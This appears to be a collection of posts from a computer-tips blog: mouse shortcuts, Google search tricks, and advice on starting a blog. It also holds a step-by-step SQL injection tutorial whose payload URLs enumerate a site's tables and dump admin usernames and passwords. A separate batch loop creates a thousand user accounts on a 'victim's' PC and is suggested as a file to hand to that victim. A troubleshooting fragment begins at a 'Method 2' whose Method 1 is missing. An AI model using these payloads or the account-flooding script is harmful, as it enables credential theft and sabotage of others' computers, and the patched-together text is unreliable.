Computer Mouse Tips

There are so many things from which you can use your computer mouse in an efficient way, most of the users do not use the mouse in an advantageous way. In this article you will come to know some computer mouse tips and secrets that may help you to use your computer mouse in an efficient way with increased productivity while you are on the computer.

======================
Select with double and triple click
======================

A word can be selected by double-clicking the word in a text document or in a webpage. If we want to highlight the whole paragraph within a document, then we have to  click the mouse button three times on any text in the paragraph.

=================
Shift key and mouse click
=================

There are so many text editors and programs in which we can highlight all or some portion of text.We normally do a click and drag of the mouse pointer but we can use the Shift key and the mouse also. For example, place the cursor at the beginning of a paragraph in a text editor, hold down the Shift key and click at the end of the paragraph to highlight the full paragraph.

======================
Use the Scroll wheel
======================

Mouse wheels  have the ability to scroll up and down on any page full of text or pictures. We can use the mouse  wheel for some other purposes also.

Apart from scrolling up and down, the mouse wheel can be used also as a button. Pressing the wheel will act like a third mouse button. This button can be used in a browser to open a link in a new tab this can be done by clicking the wheel on any link and can also be used to close a tab by clicking the wheel on any open tab.

By holding the CTRL key and scrolling up and down, we can also zoom In and Out on a web page, word document, excel spreadsheet, etc.

Scrolling UP and DOWN while holding the SHIFT key while browsing  Internet, Scrolling down goes back and scrolling up goes forward.

NOTE: Some mouse wheels can be pushed left or right to also move back and forward on a web page.

===========
Use the right-click
===========
In a browser pressing and holding Ctrl while clicking on any link will open that link in a new tab.

=======================
Ctrl key and mouse click or highlight
=======================

Holding down the Ctrl key and tapping left-click on multiple objects to  select multiple objects or we can highlight multiple sections of text.
Example:-

Holding  the Ctrl key and click on multiple files to select selected files at once. If  different parts of a paragraph or web page are wished to be highlighted , we could also hold down the Ctrl key and select each section we wish to copy.

Mozilla Firefox users can also hold down the Ctrl key and individually click on each cell in a table they wish to copy or drag their mouse down a row to select just that row or text without selecting any of the other text in that table.

=====================
Use the Windows Snap To feature
======================

Take full advantage of the Windows mouse Snap To feature, which will automatically move your mouse to buttons that appear in a dialog box. For example, if you delete a file or close a window you may get a prompt asking you if you are sure you want to perform the task. With the Snap To feature enabled, the mouse cursor automatically moves to the Ok button, so all you will have to do is click the mouse button if you agree. This saves you the time of having to move the mouse cursor over to the Ok button and then click Ok. To enable this feature open the Mouse properties under the Windows Control Panel and check the Snap To check box under the Pointer Options tab.

Tip: While changing this feature we also suggest looking at other available options in the Mouse settings. For example, increasing the Motion speed can also help increase your productivity while using the mouse.

===========================
Manage the open window with the mouse
===========================

Double-click the top title bar of any window to maximize a window or if it is already maximized resize it to a window. You can also double-click the icon for the window in the top-left corner of the window to close that window.

========================
Move the mouse with your keyboard
========================

Instead of using the mouse that came with your computer you can also enable Windows to use the number pad as a mouse.

================
Customize your mouse
================
Finally, if you have a mouse with more than two buttons, installing the included mouse software will allow you to customize the mouse even more. For example, if you don't use the side buttons to move back and forth in a web page change it to something you do more often, such as switching between open windows or opening the calculator.

NOTE: Not all BIOS offers the feature to run a Hard Drive and Memory test.

Method 2:

If your BIOS doesn't offers the feature to do the Method 1
OR
If your BIOS passes the Method 1 test then try this method.

Open your command prompt with administrator privileges, to do that follow these steps:

i. Click on start menu.
ii.  Find "Command prompt" ,then right click on that and choose "Run as Administrator"
iii.  Into the prompt type the following command and hit enter.
"sfc/scannow"           (without quotes,note that there may be a space between sfc and the /)

Let the process to be complete (it may take several minutes or hours depending on your processors),after the completion type in "exit" (without quotes) and then hit enter.

Next to that ,open My Computer ,Right click on Local disk C (or the disk which contains the windows operating system), click on Properties.

Click "Tools Tab" and then click the button "Check the drive for errors".

In the following window check and make sure that both boxes are ticked and then click on "Start".
Just "Agree to the schedule the check at the next system restart and then restart your machine.

SQL Injection step by step (for Beginners)-"For Educational Purpose Only"
-----------------------------------------------------------------------

What is SQL Injection?

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database of a Website.

Steps to Inject SQL on a Website

Step 1:

---------

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:

www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2:

----------

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--

http://www.site.com/page=1 order by 2--

http://www.site.com/page=1 order by 3--

http://www.site.com/page=1 order by 4--

http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3:

---------
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,for example:

www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and
3. This means columns 2 and 3 are vulnerable.

Step 4:

----------
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:

user()database()version()

or if these dont work try...

@@user@@version@@database

For example the url would look like:

www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5:

----------
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.UNION SELECT 1,table_name,3,4 FROM information_schema.tables--So the url would look like:

www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6:

---------

In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7:

----------
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command:

union all select 1,2,group_concat(username,0x3a,password),4 from admin--

So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.

NOTE: This tutorial is for EDUCATIONAL purpose only.Do not try to inject any website as you may suffer a fine or spend time behind the bars also.

Google Tips and tricks

Hello folks..!

There are many things which you can do with google itself..!!

Google will search only those things which you want to search.

 suppose if you want "Definitions" only
Pull up the definition of the word by typing "define" followed by the word you want the definition for. For example, typing: "define bravura" would display the definition of that word.

Local search

Visit Google Local enter the area you want to search and the keyword of the place you want to find. For example, typing: restaurant at the above link would display local restaurants.

Phone number lookup

Enter a full phone number with area code to display the name and address associated with that phone number.

Find weather and movies

Type "weather" or "movies" followed by a zip code or city and state to display current weather conditions or movie theaters in your area. For example, typing weather 84101 gives you the current weather conditions for Salt Lake City, UT and the next four days. Typing movies 84101 would give you a link for show times for movies in that area.

Track airline flight and packages

Enter the airline and flight number to display the status of an airline flight and it's arrival time. For example, type: delta 123 to display this flight information if available.

Google can also give a direct link to package tracking information if you enter a UPS, FedEx or USPS tracking number.

Translate

Translate text, a full web page, or search by using the Google Language Tools.

Pages linked to you

See what other web pages are linking to your website or blog by typing link: followed by your URL. For example, typing link: http://www.community-cs.blogspot.com displays all pages linking to Computer Science Community
.

Find PDF results only

Add fileType: to your search to display results that only match a certain file type. For example, if you wanted to display PDF results only type: "dell xps" fileType:pdf -- this is a great way to find online manuals.

Calculator

Use the Google Search engine as a calculator by typing a math problem in the search. For example, typing: 100 + 200 would display results as 300.

Stocks

Quickly get to a stock quote price, chart, and related links by typing the stock symbol in Google. For example, typing: msft will display the stock information for Microsoft.

Tips For Launching Your Own Blog

Blogging has developed from a specialized hobby to a full-time occupation. Many writers live off of their blogs, and anyone with something unique to say can gain an audience and a steady paycheck with the right techniques.

Starting A New Blog

Launching a blog requires some planning. This starts with the name and address of the blog.
It’s important to pick a good domain name, as the URL of a website is one of the most powerful tools that a blogger has at his disposal for repeat traffic. Think of a domain name as a 21st century toll free number: It has to be memorable or it won’t be effective.
  • blog’s domain name should be descriptive of its subject and preferably a bit unusual. For example, a blog about arrowheads could simply be titled, “Arrowheads And How To Identify Them,” but something like “As The Arrowhead Flies” would be more memorable.
Bloggers should also try to pick a unique subject or to bring a unique perspective to the entries. Writing about hundreds of subjects will rarely lead to a successful blog. Content should be focused and direct. Visitors should know exactly what type of information that they can find on the blog, and using direct and simple approach improves the chances of regular traffic.

Blog Hosting Providers

Most bloggers use a hosting provider like WordPress.com or Blogger. There are several major advantages to these services. They’re inexpensive and may even be free until a blog develops large amounts of regular traffic. Also, the online blogging software provided by these hosting services offers instant, easy organization for a blog of any size.
Many bloggers know only basic HTML and don’t really want to invest a lot of time into things like page design. For these individuals, integration with a hosting provider can keep costs down while streamlining the blogging process. They’re also ideal for first time bloggers because they simplify the process. By using a hosting provider you’ll spend more time writing and less time worrying about page design and web programming languages.
Professional and amateur bloggers will need to consider the price and uptime of various hosting providers before making a selection. The service packages of websites like WordPress.com and Blogger change quite often in both price and offerings. It’s usually a good idea to start out with a package that offers at least 50% more capability for incoming traffic than you plan on using each month. This way, your blog won’t suddenly crash if you write a successful post.
Blogging services can quickly become expensive. They’re worth the money in the long run, as they’ll allow you to keep all of the earnings from ads on your new blog–which is something that free alternatives with “unlimited bandwidth” won’t offer you.
Speaking of money, you’ll have to be on the lookout for ways to make a profit from a blog. Most blogs use ads from Google and Amazon Marketplace. Many bloggers also offer other services and products directly from their sites.

Promoting Your Blog

Blogs need to be promoted in order to flourish. It’s very rare for a blog to receive large amounts of traffic from search engines like Google alone, especially when the blog’s just getting started. A good promotion strategy is absolutely essential, and a strong promotion strategy begins with social media websites.
Promote each blog post from a new blog on websites like Twitter and Facebook. Don’t spam your friends and followers; only post a single link to each blog post, and try to reach out to other bloggers through social websites. Developing a relationship with other writers will allow you to learn about the good habits that lead to regular traffic. You can even ask another writer to post a guest entry on your blog from time to time. This is a good way to build an audience of regular readers.
Always check the comments for each entry and respond to your readers. Cultivate a sense of community by interacting with each commenter and even addressing some of their questions or comments directly in new blog posts. This encourages the return traffic that is important for a new blog.
Finally, blog regularly. Any blog will fail if it doesn’t have regular posts. Posting once a day or more will keep visitors coming back and will quickly lead to better opportunities for money and better traffic. Every blogger should consider consistency to be extremely important–keep a consistent stream of quality entries for the best possible success.

Thank you..:))

How to create infinite User Accounts in Windows

Hello folks..!!
 We all know that the " net user XYZ/add " command will add new user (XYZ)  to the computer ..!!
I am  just going through a BATCH PROGRAMMING ebook .. and learned about the "FOR loop commands in batch file programming""

So, if we type in cmd (need to have administrative privilleges in windows 7/ XP/ Vista)

''' for /l %i in (1,1,1000) do net user user%i /add "

this command will add 1000 users on  the victims computer ..!!
and if he/she is a newbiee then it takes him/her a long time to remove all the users!!

don't use it on your  own PC!!

(however if u had used this trick on your own PC,then there is no need to delete each user account one by one,all you have to do is just open the command prompt with admin privileges and type in

''' for /l %i in (1,1,1000) do net user user%i /del"

this command will delete all the users created by the former command..!!

and yes you can also create a batch file for this as whensoever the victim will execute this batch file , his/her computer will be filled by thousand's of user accounts ..!!

if you are creating a batch file then u must have to declare the looping variable "i' as "%%i" instead of "%i"..

enjoy..:))

similarly u can create 100000's of folders using this for loop command..!!

"for /l %i in (1,1,1000) do md folder%i "

Hope you liked the article..!!
